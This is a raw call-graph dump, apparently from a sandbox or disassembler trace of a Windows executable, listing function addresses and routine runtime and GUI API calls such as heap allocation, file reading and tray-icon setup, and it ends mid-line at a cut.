87016->87013 87017 752d89 87016->87017 87114 752567 47 API calls 2 library calls 87016->87114 87115 746e20 IsProcessorFeaturePresent 87017->87115 87019 752d95 87019->86937 87021 7411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 87020->87021 87023 7411e0 __IsNonwritableInCurrentImage 87021->87023 87138 740f0a 52 API calls __cinit 87021->87138 87023->86941 87025 791ebf 87024->87025 87026 723a29 87024->87026 87027 723a63 IsThemeActive 87026->87027 87139 741405 87027->87139 87031 723a8f 87151 723adb SystemParametersInfoW SystemParametersInfoW 87031->87151 87033 723a9b 87152 723d19 87033->87152 87035 723aa3 SystemParametersInfoW 87036 723ac8 87035->87036 87036->86945 87037->86921 87038->86923 87039->86930 87043->86946 87044->86949 87045->86955 87046->86957 87047->86961 87048->86962 87051 74698d 87049->87051 87052 7469ca 87051->87052 87053 7469ab Sleep 87051->87053 87058 7530aa 87051->87058 87052->86966 87055 747ec9 TlsSetValue 87052->87055 87054 7469c2 87053->87054 87054->87051 87054->87052 87055->86970 87056->86973 87057->86969 87059 7530b5 87058->87059 87064 7530d0 __calloc_impl 87058->87064 87060 7530c1 87059->87060 87059->87064 87065 747c0e 47 API calls __getptd_noexit 87060->87065 87062 7530e0 RtlAllocateHeap 87063 7530c6 87062->87063 87062->87064 87063->87051 87064->87062 87064->87063 87065->87063 87067 747d05 87066->87067 87068 747d18 EnterCriticalSection 87066->87068 87074 747d7c 87067->87074 87068->86977 87070 747d0b 87070->87068 87098 74115b 47 API calls 3 library calls 87070->87098 87073->86981 87075 747d88 __getstream 87074->87075 87076 747d91 87075->87076 87077 747da9 87075->87077 87099 7481c2 47 API calls 2 library calls 87076->87099 87079 747da7 87077->87079 87085 747e11 __getstream 87077->87085 87079->87077 87102 7469d0 47 API calls __crtLCMapStringA_stat 87079->87102 87080 747d96 87100 74821f 47 API calls 7 library calls 87080->87100 87083 747dbd 87086 747dc4 87083->87086 87087 747dd3 87083->87087 87084 747d9d 87101 741145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 87084->87101 87085->87070 87103 747c0e 47 API calls __getptd_noexit 87086->87103 87090 747cf4 __lock 46 API calls 87087->87090 87091 747dda 87090->87091 87093 747dfe 87091->87093 87094 747de9 InitializeCriticalSectionAndSpinCount 87091->87094 87092 747dc9 87092->87085 87104 741c9d 87093->87104 87096 747e04 87094->87096 87110 747e1a LeaveCriticalSection _doexit 87096->87110 87099->87080 87100->87084 87102->87083 87103->87092 87105 741ca6 RtlFreeHeap 87104->87105 87109 741ccf _free 87104->87109 87106 741cbb 87105->87106 87105->87109 87111 747c0e 47 API calls __getptd_noexit 87106->87111 87108 741cc1 GetLastError 87108->87109 87109->87096 87110->87085 87111->87108 87112->86998 87113->87005 87114->87016 87116 746e2b 87115->87116 87121 746cb5 87116->87121 87120 746e46 87120->87019 87122 746ccf _memset __call_reportfault 87121->87122 87123 746cef IsDebuggerPresent 87122->87123 87129 7481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 87123->87129 87126 746db3 __call_reportfault 87130 74a70c 87126->87130 87127 746dd6 87128 748197 GetCurrentProcess TerminateProcess 87127->87128 87128->87120 87129->87126 87131 74a714 87130->87131 87132 74a716 IsProcessorFeaturePresent 87130->87132 87131->87127 87134 7537b0 87132->87134 87137 75375f 5 API calls 2 library calls 87134->87137 87136 753893 87136->87127 87137->87136 87138->87023 87140 747cf4 __lock 47 API calls 87139->87140 87141 741410 87140->87141 87204 747e58 LeaveCriticalSection 87141->87204 87143 723a88 87144 74146d 87143->87144 87145 741477 87144->87145 87146 741491 87144->87146 87145->87146 87205 747c0e 47 API calls __getptd_noexit 87145->87205 87146->87031 87148 741481 87206 746e10 8 API calls _fprintf 87148->87206 87150 74148c 87150->87031 87151->87033 87153 723d26 __ftell_nolock 87152->87153 87154 72d7f7 48 API calls 87153->87154 87155 723d31 GetCurrentDirectoryW 87154->87155 87207 7261ca 87155->87207 87157 723d57 IsDebuggerPresent 87158 723d65 87157->87158 87159 791cc1 MessageBoxA 87157->87159 87160 723e3a 87158->87160 87162 791cd9 87158->87162 87163 723d82 87158->87163 87159->87162 87161 723e41 SetCurrentDirectoryW 87160->87161 87164 723e4e Mailbox 87161->87164 87393 73c682 48 API calls 87162->87393 87281 7240e5 87163->87281 87164->87035 87167 791ce9 87173 791cff SetCurrentDirectoryW 87167->87173 87169 723da0 GetFullPathNameW 87170 726a63 48 API calls 87169->87170 87171 723ddb 87170->87171 87297 726430 87171->87297 87173->87164 87175 723df6 87176 723e00 87175->87176 87394 7671fa AllocateAndInitializeSid CheckTokenMembership FreeSid 87175->87394 87313 723e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87176->87313 87179 791d1c 87179->87176 87182 791d2d 87179->87182 87184 725374 50 API calls 87182->87184 87183 723e0a 87185 723e1f 87183->87185 87321 724ffc 87183->87321 87186 791d35 87184->87186 87331 72e8d0 87185->87331 87189 72ce19 48 API calls 87186->87189 87191 791d42 87189->87191 87192 791d49 87191->87192 87193 791d6e 87191->87193 87196 72518c 48 API calls 87192->87196 87195 72518c 48 API calls 87193->87195 87197 791d6a GetForegroundWindow ShellExecuteW 87195->87197 87198 791d54 87196->87198 87201 791d9e Mailbox 87197->87201 87200 72510d 48 API calls 87198->87200 87202 791d61 87200->87202 87201->87160 87203 72518c 48 API calls 87202->87203 87203->87197 87204->87143 87205->87148 87206->87150 87395 73e99b 87207->87395 87211 7261eb 87212 725374 50 API calls 87211->87212 87213 7261ff 87212->87213 87214 72ce19 48 API calls 87213->87214 87215 72620c 87214->87215 87412 7239db 87215->87412 87217 726216 Mailbox 87218 726eed 48 API calls 87217->87218 87219 72622b 87218->87219 87424 729048 87219->87424 87222 72ce19 48 API calls 87223 726244 87222->87223 87224 72d6e9 55 API calls 87223->87224 87225 726254 Mailbox 87224->87225 87226 72ce19 48 API calls 87225->87226 87227 72627c 87226->87227 87228 72d6e9 55 API calls 87227->87228 87229 72628f Mailbox 87228->87229 87230 72ce19 48 API calls 87229->87230 87231 7262a0 87230->87231 87427 72d645 87231->87427 87233 7262b2 Mailbox 87234 72d7f7 48 API calls 87233->87234 87235 7262c5 87234->87235 87437 7263fc 87235->87437 87239 7262df 87240 791c08 87239->87240 87241 7262e9 87239->87241 87242 7263fc 48 API calls 87240->87242 87243 740fa7 _W_store_winword 59 API calls 87241->87243 87244 791c1c 87242->87244 87245 7262f4 87243->87245 87248 7263fc 48 API calls 87244->87248 87245->87244 87246 7262fe 87245->87246 87247 740fa7 _W_store_winword 59 API calls 87246->87247 87249 726309 87247->87249 87250 791c38 87248->87250 87249->87250 87251 726313 87249->87251 87253 725374 50 API calls 87250->87253 87252 740fa7 _W_store_winword 59 API calls 87251->87252 87254 72631e 87252->87254 87255 791c5d 87253->87255 87256 72635f 87254->87256 87259 791c86 87254->87259 87262 7263fc 48 API calls 87254->87262 87257 7263fc 48 API calls 87255->87257 87256->87259 87260 72636c 87256->87260 87258 791c69 87257->87258 87261 726eed 48 API calls 87258->87261 87263 726eed 48 API calls 87259->87263 87267 73c050 48 API calls 87260->87267 87264 791c77 87261->87264 87265 726342 87262->87265 87266 791ca8 87263->87266 87269 7263fc 48 API calls 87264->87269 87270 726eed 48 API calls 87265->87270 87271 7263fc 48 API calls 87266->87271 87268 726384 87267->87268 87453 731b90 87268->87453 87269->87259 87273 726350 87270->87273 87274 791cb5 87271->87274 87275 7263fc 48 API calls 87273->87275 87274->87274 87275->87256 87276 731b90 48 API calls 87278 726394 87276->87278 87278->87276 87279 7263fc 48 API calls 87278->87279 87280 7263d6 Mailbox 87278->87280 87469 726b68 48 API calls 87278->87469 87279->87278 87280->87157 87282 7240f2 __ftell_nolock 87281->87282 87283 79370e _memset 87282->87283 87284 72410b 87282->87284 87286 79372a GetOpenFileNameW 87283->87286 87285 72660f 49 API calls 87284->87285 87287 724114 87285->87287 87288 793779 87286->87288 88098 7240a7 87287->88098 87291 726a63 48 API calls 87288->87291 87293 79378e 87291->87293 87293->87293 87294 724129 88116 724139 87294->88116 87298 72643d __ftell_nolock 87297->87298 88315 724c75 87298->88315 87300 726442 87301 723dee 87300->87301 88326 725928 87 API calls 87300->88326 87301->87167 87301->87175 87303 72644f 87303->87301 88327 725798 89 API calls Mailbox 87303->88327 87305 726458 87305->87301 87306 72645c GetFullPathNameW 87305->87306 87307 726a63 48 API calls 87306->87307 87308 726488 87307->87308 87309 726a63 48 API calls 87308->87309 87310 726495 87309->87310 87311 795dcf _wcscat 87310->87311 87312 726a63 48 API calls 87310->87312 87312->87301 87314 791cba 87313->87314 87315 723ed8 87313->87315 88373 724024 87315->88373 87319 723e05 87320 7236b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87319->87320 87320->87183 87322 725027 _memset 87321->87322 88378 724c30 87322->88378 87325 7250ac 87327 793d28 Shell_NotifyIconW 87325->87327 87328 7250ca Shell_NotifyIconW 87325->87328 88382 7251af 87328->88382 87330 7250df 87330->87185 87332 72e8f6 87331->87332 87391 72e906 Mailbox 87331->87391 87333 72ed52 87332->87333 87332->87391 88575 73e3cd 332 API calls 87333->88575 87335 723e2a 87335->87160 87392 723847 Shell_NotifyIconW _memset 87335->87392 87337 72ed63 87337->87335 87339 72ed70 87337->87339 87338 72e94c PeekMessageW 87338->87391 88577 73e312 332 API calls Mailbox 87339->88577 87341 79526e Sleep 87341->87391 87342 72ed77 LockWindowUpdate DestroyWindow GetMessageW 87342->87335 87343 72ebc7 87343->87335 88576 722ff6 16 API calls 87343->88576 87349 72ed21 PeekMessageW 87349->87391 87350 72ebf7 timeGetTime 87350->87391 87352 726eed 48 API calls 87352->87391 87353 72ed3a TranslateMessage DispatchMessageW 87353->87349 87354 73f4ea 48 API calls 87354->87391 87355 795557 WaitForSingleObject 87358 795574 GetExitCodeProcess CloseHandle 87355->87358 87355->87391 87356 72d7f7 48 API calls 87386 795429 Mailbox 87356->87386 87357 79588f Sleep 87357->87386 87358->87391 87359 72edae timeGetTime 88578 721caa 49 API calls 87359->88578 87361 795733 Sleep 87361->87386 87362 73dc38 timeGetTime 87362->87386 87365 722aae 308 API calls 87365->87391 87367 795926 GetExitCodeProcess 87369 79593c WaitForSingleObject 87367->87369 87370 795952 CloseHandle 87367->87370 87368 795445 Sleep 87368->87391 87369->87370 87369->87391 87370->87386 87371 795432 Sleep 87371->87368 87372 788c4b 109 API calls 87372->87386 87373 722c79 108 API calls 87373->87386 87375 7959ae Sleep 87375->87391 87376 721caa 49 API calls 87376->87391 87379 72ce19 48 API calls 87379->87386 87382 72d6e9 55 API calls 87382->87386 87386->87356 87386->87362 87386->87367 87386->87368 87386->87371 87386->87372 87386->87373 87386->87375 87386->87379 87386->87382 87386->87391 88580 764cbe 49 API calls Mailbox 87386->88580 88581 721caa 49 API calls 87386->88581 88582 722aae 332 API calls 87386->88582 88612 77ccb2 50 API calls 87386->88612 88613 767a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87386->88613 88614 766532 63 API calls 3 library calls 87386->88614 87388 76cc5c 87 API calls 87388->87391 87389 72ce19 48 API calls 87389->87391 87390 72d6e9 55 API calls 87390->87391 87391->87338 87391->87341 87391->87343 87391->87349 87391->87350 87391->87352 87391->87353 87391->87354 87391->87355 87391->87357 87391->87359 87391->87361 87391->87365 87391->87368 87391->87376 87391->87386 87391->87388 87391->87389 87391->87390 88405 72ef00 87391->88405 88410 72f110 87391->88410 88475 7345e0 87391->88475 88492 733200 87391->88492 88564 73e244 87391->88564 88569 73dc5f 87391->88569 88574 72eed0 332 API calls Mailbox 87391->88574 88579 788d23 48 API calls 87391->88579 88583 72fe30 87391->88583 87392->87160 87393->87167 87394->87179 87396 72d7f7 48 API calls 87395->87396 87397 7261db 87396->87397 87398 726009 87397->87398 87399 726016 __ftell_nolock 87398->87399 87400 726a63 48 API calls 87399->87400 87405 72617c Mailbox 87399->87405 87402 726048 87400->87402 87410 72607e Mailbox 87402->87410 87470 7261a6 87402->87470 87403 72614f 87404 72ce19 48 API calls 87403->87404 87403->87405 87407 726170 87404->87407 87405->87211 87406 72ce19 48 API calls 87406->87410 87408 7264cf 48 API calls 87407->87408 87408->87405 87409 7264cf 48 API calls 87409->87410 87410->87403 87410->87405 87410->87406 87410->87409 87411 7261a6 48 API calls 87410->87411 87411->87410 87473 7241a9 87412->87473 87415 723a06 87415->87217 87418 792ff0 87420 741c9d _free 47 API calls 87418->87420 87421 792ffd 87420->87421 87422 724252 84 API calls 87421->87422 87423 793006 87422->87423 87423->87423 87425 73f4ea 48 API calls 87424->87425 87426 726237 87425->87426 87426->87222 87428 72d654 87427->87428 87435 72d67e 87427->87435 87429 72d65b 87428->87429 87430 72d6c2 87428->87430 87431 72d666 87429->87431 87436 72d6ab 87429->87436 87430->87436 88092 73dce0 53 API calls 87430->88092 88090 72d9a0 53 API calls __cinit 87431->88090 87435->87233 87436->87435 88091 73dce0 53 API calls 87436->88091 87438 726406 87437->87438 87439 72641f 87437->87439 87440 726eed 48 API calls 87438->87440 87441 726a63 48 API calls 87439->87441 87442 7262d1 87440->87442 87441->87442 87443 740fa7 87442->87443 87444 740fb3 87443->87444 87445 741028 87443->87445 87452 740fd8 87444->87452 88093 747c0e 47 API calls __getptd_noexit 87444->88093 88095 74103a 59 API calls 4 library calls 87445->88095 87447 741035 87447->87239 87449 740fbf 88094 746e10 8 API calls _fprintf 87449->88094 87451 740fca 87451->87239 87452->87239 87454 731cf6 87453->87454 87457 731ba2 87453->87457 87454->87278 87455 731bae 87460 731bb9 87455->87460 88097 73c15c 48 API calls 87455->88097 87457->87455 87458 73f4ea 48 API calls 87457->87458 87459 7949c4 87458->87459 87462 73f4ea 48 API calls 87459->87462 87461 731c5d 87460->87461 87463 73f4ea 48 API calls 87460->87463 87461->87278 87468 7949cf 87462->87468 87464 731c9f 87463->87464 87465 731cb2 87464->87465 88096 722925 48 API calls 87464->88096 87465->87278 87467 73f4ea 48 API calls 87467->87468 87468->87455 87468->87467 87469->87278 87471 72bdfa 48 API calls 87470->87471 87472 7261b1 87471->87472 87472->87402 87538 724214 87473->87538 87478 7241d4 LoadLibraryExW 87548 724291 87478->87548 87479 794f73 87480 724252 84 API calls 87479->87480 87482 794f7a 87480->87482 87484 724291 3 API calls 87482->87484 87486 794f82 87484->87486 87574 7244ed 87486->87574 87487 7241fb 87487->87486 87488 724207 87487->87488 87489 724252 84 API calls 87488->87489 87491 7239fe 87489->87491 87491->87415 87497 76c396 87491->87497 87494 794fa9 87582 724950 87494->87582 87496 794fb6 87498 724517 83 API calls 87497->87498 87499 76c405 87498->87499 87875 76c56d 87499->87875 87502 7244ed 64 API calls 87503 76c432 87502->87503 87504 7244ed 64 API calls 87503->87504 87505 76c442 87504->87505 87506 7244ed 64 API calls 87505->87506 87507 76c45d 87506->87507 87508 7244ed 64 API calls 87507->87508 87509 76c478 87508->87509 87510 724517 83 API calls 87509->87510 87511 76c48f 87510->87511 87512 74395c __crtLCMapStringA_stat 47 API calls 87511->87512 87513 76c496 87512->87513 87514 74395c __crtLCMapStringA_stat 47 API calls 87513->87514 87515 76c4a0 87514->87515 87516 7244ed 64 API calls 87515->87516 87517 76c4b4 87516->87517 87518 76bf5a GetSystemTimeAsFileTime 87517->87518 87519 76c4c7 87518->87519 87520 76c4f1 87519->87520 87521 76c4dc 87519->87521 87523 76c556 87520->87523 87524 76c4f7 87520->87524 87522 741c9d _free 47 API calls 87521->87522 87526 76c4e2 87522->87526 87525 741c9d _free 47 API calls 87523->87525 87881 76b965 87524->87881 87528 76c41b 87525->87528 87529 741c9d _free 47 API calls 87526->87529 87528->87418 87532 724252 87528->87532 87529->87528 87531 741c9d _free 47 API calls 87531->87528 87533 724263 87532->87533 87534 72425c 87532->87534 87536 724272 87533->87536 87537 724283 FreeLibrary 87533->87537 87535 7435e4 __fcloseall 83 API calls 87534->87535 87535->87533 87536->87418 87537->87536 87587 724339 87538->87587 87541 72423c 87542 724244 FreeLibrary 87541->87542 87543 7241bb 87541->87543 87542->87543 87545 743499 87543->87545 87595 7434ae 87545->87595 87547 7241c8 87547->87478 87547->87479 87674 7242e4 87548->87674 87551 7242b8 87552 7242c1 FreeLibrary 87551->87552 87553 7241ec 87551->87553 87552->87553 87555 724380 87553->87555 87556 73f4ea 48 API calls 87555->87556 87557 724395 87556->87557 87558 7247b7 48 API calls 87557->87558 87559 7243a1 _memcpy_s 87558->87559 87560 7243dc 87559->87560 87562 7244d1 87559->87562 87563 724499 87559->87563 87561 724950 57 API calls 87560->87561 87566 7243e5 87561->87566 87693 76c750 93 API calls 87562->87693 87682 72406b CreateStreamOnHGlobal 87563->87682 87567 7244ed 64 API calls 87566->87567 87569 724479 87566->87569 87570 794ed7 87566->87570 87688 724517 87566->87688 87567->87566 87569->87487 87571 724517 83 API calls 87570->87571 87572 794eeb 87571->87572 87573 7244ed 64 API calls 87572->87573 87573->87569 87575 794fc0 87574->87575 87576 7244ff 87574->87576 87717 74381e 87576->87717 87579 76bf5a 87852 76bdb4 87579->87852 87581 76bf70 87581->87494 87583 795002 87582->87583 87584 72495f 87582->87584 87857 743e65 87584->87857 87586 724967 87586->87496 87591 72434b 87587->87591 87590 724321 LoadLibraryA GetProcAddress 87590->87541 87592 72422f 87591->87592 87593 724354 LoadLibraryA 87591->87593 87592->87541 87592->87590 87593->87592 87594 724365 GetProcAddress 87593->87594 87594->87592 87596 7434ba __getstream 87595->87596 87597 7434cd 87596->87597 87600 7434fe 87596->87600 87643 747c0e 47 API calls __getptd_noexit 87597->87643 87599 7434d2 87644 746e10 8 API calls _fprintf 87599->87644 87614 74e4c8 87600->87614 87603 743503 87604 74350c 87603->87604 87605 743519 87603->87605 87645 747c0e 47 API calls __getptd_noexit 87604->87645 87607 743543 87605->87607 87608 743523 87605->87608 87628 74e5e0 87607->87628 87646 747c0e 47 API calls __getptd_noexit 87608->87646 87611 7434dd @_EH4_CallFilterFunc@8 __getstream 87611->87547 87615 74e4d4 __getstream 87614->87615 87616 747cf4 __lock 47 API calls 87615->87616 87626 74e4e2 87616->87626 87617 74e552 87648 74e5d7 87617->87648 87618 74e559 87653 7469d0 47 API calls __crtLCMapStringA_stat 87618->87653 87621 74e5cc __getstream 87621->87603 87622 74e560 87622->87617 87623 74e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 87622->87623 87623->87617 87624 747d7c __mtinitlocknum 47 API calls 87624->87626 87626->87617 87626->87618 87626->87624 87651 744e5b 48 API calls __lock 87626->87651 87652 744ec5 LeaveCriticalSection LeaveCriticalSection _doexit 87626->87652 87636 74e600 __wopenfile 87628->87636 87629 74e61a 87658 747c0e 47 API calls __getptd_noexit 87629->87658 87631 74e61f 87659 746e10 8 API calls _fprintf 87631->87659 87633 74354e 87647 743570 LeaveCriticalSection LeaveCriticalSection _fseek 87633->87647 87634 74e838 87655 7563c9 87634->87655 87636->87629 87642 74e7d5 87636->87642 87660 74185b 59 API calls 3 library calls 87636->87660 87638 74e7ce 87638->87642 87661 74185b 59 API calls 3 library calls 87638->87661 87640 74e7ed 87640->87642 87662 74185b 59 API calls 3 library calls 87640->87662 87642->87629 87642->87634 87643->87599 87644->87611 87645->87611 87646->87611 87647->87611 87654 747e58 LeaveCriticalSection 87648->87654 87650 74e5de 87650->87621 87651->87626 87652->87626 87653->87622 87654->87650 87663 755bb1 87655->87663 87657 7563e2 87657->87633 87658->87631 87659->87633 87660->87638 87661->87640 87662->87642 87664 755bbd __getstream 87663->87664 87665 755bcf 87664->87665 87668 755c06 87664->87668 87666 747c0e __setmbcp 47 API calls 87665->87666 87667 755bd4 87666->87667 87669 746e10 _fprintf 8 API calls 87667->87669 87670 755c78 __wsopen_helper 110 API calls 87668->87670 87673 755bde __getstream 87669->87673 87671 755c23 87670->87671 87672 755c4c __wsopen_helper LeaveCriticalSection 87671->87672 87672->87673 87673->87657 87678 7242f6 87674->87678 87677 7242cc LoadLibraryA GetProcAddress 87677->87551 87679 7242aa 87678->87679 87680 7242ff LoadLibraryA 87678->87680 87679->87551 87679->87677 87680->87679 87681 724310 GetProcAddress 87680->87681 87681->87679 87683 724085 FindResourceExW 87682->87683 87687 7240a2 87682->87687 87684 794f16 LoadResource 87683->87684 87683->87687 87685 794f2b SizeofResource 87684->87685 87684->87687 87686 794f3f LockResource 87685->87686 87685->87687 87686->87687 87687->87560 87689 724526 87688->87689 87691 794fe0 87688->87691 87694 743a8d 87689->87694 87692 724534 87692->87566 87693->87560 87695 743a99 __getstream 87694->87695 87696 743aa7 87695->87696 87698 743acd 87695->87698 87707 747c0e 47 API calls __getptd_noexit 87696->87707 87709 744e1c 87698->87709 87699 743aac 87708 746e10 8 API calls _fprintf 87699->87708 87702 743ad3 87715 7439fe 81 API calls 4 library calls 87702->87715 87704 743ae2 87716 743b04 LeaveCriticalSection LeaveCriticalSection _fseek 87704->87716 87706 743ab7 __getstream 87706->87692 87707->87699 87708->87706 87710 744e2c 87709->87710 87711 744e4e EnterCriticalSection 87709->87711 87710->87711 87713 744e34 87710->87713 87712 744e44 87711->87712 87712->87702 87714 747cf4 __lock 47 API calls 87713->87714 87714->87712 87715->87704 87716->87706 87720 743839 87717->87720 87719 724510 87719->87579 87721 743845 __getstream 87720->87721 87722 743888 87721->87722 87723 74385b _memset 87721->87723 87724 743880 __getstream 87721->87724 87725 744e1c __lock_file 48 API calls 87722->87725 87747 747c0e 47 API calls __getptd_noexit 87723->87747 87724->87719 87727 74388e 87725->87727 87733 74365b 87727->87733 87728 743875 87748 746e10 8 API calls _fprintf 87728->87748 87737 743676 _memset 87733->87737 87740 743691 87733->87740 87734 743681 87848 747c0e 47 API calls __getptd_noexit 87734->87848 87736 743686 87849 746e10 8 API calls _fprintf 87736->87849 87737->87734 87737->87740 87745 7436cf 87737->87745 87749 7438c2 LeaveCriticalSection LeaveCriticalSection _fseek 87740->87749 87741 7437e0 _memset 87851 747c0e 47 API calls __getptd_noexit 87741->87851 87745->87740 87745->87741 87750 742933 87745->87750 87757 74ee0e 87745->87757 87828 74eb66 87745->87828 87850 74ec87 47 API calls 4 library calls 87745->87850 87747->87728 87748->87724 87749->87724 87751 742952 87750->87751 87752 74293d 87750->87752 87751->87745 87753 747c0e __setmbcp 47 API calls 87752->87753 87754 742942 87753->87754 87755 746e10 _fprintf 8 API calls 87754->87755 87756 74294d 87755->87756 87756->87745 87758 74ee46 87757->87758 87759 74ee2f 87757->87759 87761 74f57e 87758->87761 87766 74ee80 87758->87766 87760 747bda __lseeki64 47 API calls 87759->87760 87763 74ee34 87760->87763 87762 747bda __lseeki64 47 API calls 87761->87762 87764 74f583 87762->87764 87765 747c0e __setmbcp 47 API calls 87763->87765 87767 747c0e __setmbcp 47 API calls 87764->87767 87771 74ee3b 87765->87771 87768 74ee88 87766->87768 87775 74ee9f 87766->87775 87770 74ee94 87767->87770 87769 747bda __lseeki64 47 API calls 87768->87769 87772 74ee8d 87769->87772 87773 746e10 _fprintf 8 API calls 87770->87773 87771->87745 87776 747c0e __setmbcp 47 API calls 87772->87776 87773->87771 87774 74eeb4 87777 747bda __lseeki64 47 API calls 87774->87777 87775->87771 87775->87774 87778 74eece 87775->87778 87779 74eeec 87775->87779 87776->87770 87777->87772 87778->87774 87782 74eed9 87778->87782 87781 7469d0 __malloc_crt 47 API calls 87779->87781 87783 74eefc 87781->87783 87784 753bf2 __stbuf 47 API calls 87782->87784 87785 74ef04 87783->87785 87786 74ef1f 87783->87786 87787 74efed 87784->87787 87788 747c0e __setmbcp 47 API calls 87785->87788 87790 74f82f __lseeki64_nolock 49 API calls 87786->87790 87789 74f066 ReadFile 87787->87789 87794 74f003 GetConsoleMode 87787->87794 87791 74ef09 87788->87791 87792 74f546 GetLastError 87789->87792 87793 74f088 87789->87793 87795 74ef2d 87790->87795 87796 747bda __lseeki64 47 API calls 87791->87796 87797 74f553 87792->87797 87798 74f046 87792->87798 87793->87792 87803 74f058 87793->87803 87799 74f017 87794->87799 87800 74f063 87794->87800 87795->87782 87801 74ef14 87796->87801 87802 747c0e __setmbcp 47 API calls 87797->87802 87805 747bed __dosmaperr 47 API calls 87798->87805 87812 74f04c 87798->87812 87799->87800 87804 74f01d ReadConsoleW 87799->87804 87800->87789 87801->87771 87806 74f558 87802->87806 87810 74f0bd 87803->87810 87811 74f32a 87803->87811 87803->87812 87804->87803 87807 74f040 GetLastError 87804->87807 87805->87812 87808 747bda __lseeki64 47 API calls 87806->87808 87807->87798 87808->87812 87809 741c9d _free 47 API calls 87809->87771 87814 74f129 ReadFile 87810->87814 87820 74f1aa 87810->87820 87811->87812 87818 74f430 ReadFile 87811->87818 87812->87771 87812->87809 87815 74f14a GetLastError 87814->87815 87824 74f154 87814->87824 87815->87824 87816 74f267 87822 74f217 MultiByteToWideChar 87816->87822 87823 74f82f __lseeki64_nolock 49 API calls 87816->87823 87817 74f257 87821 747c0e __setmbcp 47 API calls 87817->87821 87819 74f453 GetLastError 87818->87819 87827 74f461 87818->87827 87819->87827 87820->87812 87820->87816 87820->87817 87820->87822 87821->87812 87822->87807 87822->87812 87823->87822 87824->87810 87825 74f82f __lseeki64_nolock 49 API calls 87824->87825 87825->87824 87826 74f82f __lseeki64_nolock 49 API calls 87826->87827 87827->87811 87827->87826 87829 74eb71 87828->87829 87832 74eb86 87828->87832 87830 747c0e __setmbcp 47 API calls 87829->87830 87831 74eb76 87830->87831 87833 746e10 _fprintf 8 API calls 87831->87833 87834 753e24 __getbuf 47 API calls 87832->87834 87835 74ebbb 87832->87835 87842 74eb81 87832->87842 87833->87842 87834->87835 87836 742933 __fputwc_nolock 47 API calls 87835->87836 87837 74ebcf 87836->87837 87838 74ed06 __filbuf 62 API calls 87837->87838 87839 74ebd6 87838->87839 87840 742933 __fputwc_nolock 47 API calls 87839->87840 87839->87842 87841 74ebf9 87840->87841 87841->87842 87843 742933 __fputwc_nolock 47 API calls 87841->87843 87842->87745 87844 74ec05 87843->87844 87844->87842 87845 742933 __fputwc_nolock 47 API calls 87844->87845 87846 74ec12 87845->87846 87847 742933 __fputwc_nolock 47 API calls 87846->87847 87847->87842 87848->87736 87849->87740 87850->87745 87851->87736 87855 74344a GetSystemTimeAsFileTime 87852->87855 87854 76bdc3 87854->87581 87856 743478 __aulldiv 87855->87856 87856->87854 87858 743e71 __getstream 87857->87858 87859 743e94 87858->87859 87860 743e7f 87858->87860 87861 744e1c __lock_file 48 API calls 87859->87861 87871 747c0e 47 API calls __getptd_noexit 87860->87871 87864 743e9a 87861->87864 87863 743e84 87872 746e10 8 API calls _fprintf 87863->87872 87873 743b0c 55 API calls 6 library calls 87864->87873 87867 743ea5 87874 743ec5 LeaveCriticalSection LeaveCriticalSection _fseek 87867->87874 87868 743e8f __getstream 87868->87586 87870 743eb7 87870->87868 87871->87863 87872->87868 87873->87867 87874->87870 87878 76c581 __tzset_nolock _wcscmp 87875->87878 87876 76bf5a GetSystemTimeAsFileTime 87876->87878 87877 76c417 87877->87502 87877->87528 87878->87876 87878->87877 87879 7244ed 64 API calls 87878->87879 87880 724517 83 API calls 87878->87880 87879->87878 87880->87878 87882 76b970 87881->87882 87883 76b97e 87881->87883 87884 743499 117 API calls 87882->87884 87885 76b9c3 87883->87885 87886 743499 117 API calls 87883->87886 87911 76b987 87883->87911 87884->87883 87912 76bbe8 87885->87912 87887 76b9a8 87886->87887 87887->87885 87889 76b9b1 87887->87889 87894 7435e4 __fcloseall 83 API calls 87889->87894 87889->87911 87890 76ba07 87891 76ba2c 87890->87891 87892 76ba0b 87890->87892 87916 76b7e5 87891->87916 87893 76ba18 87892->87893 87896 7435e4 __fcloseall 83 API calls 87892->87896 87898 7435e4 __fcloseall 83 API calls 87893->87898 87893->87911 87894->87911 87896->87893 87898->87911 87899 76ba5a 87925 76ba8a 87899->87925 87900 76ba3a 87902 76ba47 87900->87902 87904 7435e4 __fcloseall 83 API calls 87900->87904 87905 7435e4 __fcloseall 83 API calls 87902->87905 87902->87911 87904->87902 87905->87911 87908 76ba75 87910 7435e4 __fcloseall 83 API calls 87908->87910 87908->87911 87910->87911 87911->87531 87913 76bc0d 87912->87913 87915 76bbf6 _memcpy_s __tzset_nolock 87912->87915 87914 74381e __fread_nolock 64 API calls 87913->87914 87914->87915 87915->87890 87917 74395c __crtLCMapStringA_stat 47 API calls 87916->87917 87918 76b7f4 87917->87918 87919 74395c __crtLCMapStringA_stat 47 API calls 87918->87919 87920 76b808 87919->87920 87921 74395c __crtLCMapStringA_stat 47 API calls 87920->87921 87922 76b81c 87921->87922 87923 76bb64 47 API calls 87922->87923 87924 76b82f 87922->87924 87923->87924 87924->87899 87924->87900 87926 76baa0 87925->87926 87927 76bb51 87926->87927 87929 76ba61 87926->87929 87930 76b841 64 API calls 87926->87930 87954 76bc67 87926->87954 87962 76b942 64 API calls 87926->87962 87958 76bd8a 87927->87958 87933 76bb64 87929->87933 87930->87926 87934 76bb71 87933->87934 87935 76bb77 87933->87935 87936 741c9d _free 47 API calls 87934->87936 87937 76bb88 87935->87937 87938 741c9d _free 47 API calls 87935->87938 87936->87935 87939 76ba68 87937->87939 87940 741c9d _free 47 API calls 87937->87940 87938->87937 87939->87908 87941 7435e4 87939->87941 87940->87939 87942 7435f0 __getstream 87941->87942 87943 743604 87942->87943 87944 74361c 87942->87944 87996 747c0e 47 API calls __getptd_noexit 87943->87996 87946 744e1c __lock_file 48 API calls 87944->87946 87951 743614 __getstream 87944->87951 87948 74362e 87946->87948 87947 743609 87997 746e10 8 API calls _fprintf 87947->87997 87980 743578 87948->87980 87951->87908 87955 76bc76 87954->87955 87956 76bcb6 87954->87956 87955->87926 87956->87955 87963 76bd3d 87956->87963 87959 76bd97 87958->87959 87960 76bda8 87958->87960 87961 742aae 